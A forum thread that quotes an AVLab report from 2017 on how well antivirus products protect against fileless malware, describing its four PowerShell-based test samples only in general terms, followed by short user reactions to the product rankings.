Fileless Malware Protection Test (AVLab, X 2017)

[ichito]

And the next test of Polish AVLab

The threats examined in this report are so-called fileless malware. Although the infection vector usually starts traditionally, i.e. from the delivery of a malicious file to the victim’s computer – via scam or a drive-by download attack as a result of using an exploit – this is where the similarities to traditional attacks with files end. The fileless malicious software operates directly in the computer’s internal memory. In this scenario, the activated virus will not be transferred to quarantine by the protecting software as it is not a file, but a set of instructions to be executed, operating on system processes.
(...)
Four types of malicious software files with similar instructions were used to check the effectiveness of protecting modules of each tested program.
• M1.bat file included an instruction of virus download via
PowerShell with suitable parameters.
• M2.exe compiled file included similar instructions.
• M3.exe file was subjected to code obfuscation.
• M4.docm file included malicious macroinstructions activating
PowerShell with relevant parameters.

https://avlab.pl/sites/default/files/68files/Malware_Fileless_Protection_Test_EN.pdf

 

[amico81]

some interesting results. But i'm very disappointed that Gdata has the last place. Kaspersky free and comodo cloud with full protection...impressive.

 

[Sunshine-boy]

As usual Arcabit is Rank 1 there:notworthy:

 

[RoboMan]

Nice job by ZoneAlarm, detecting the threat on the browser already on all scenarios!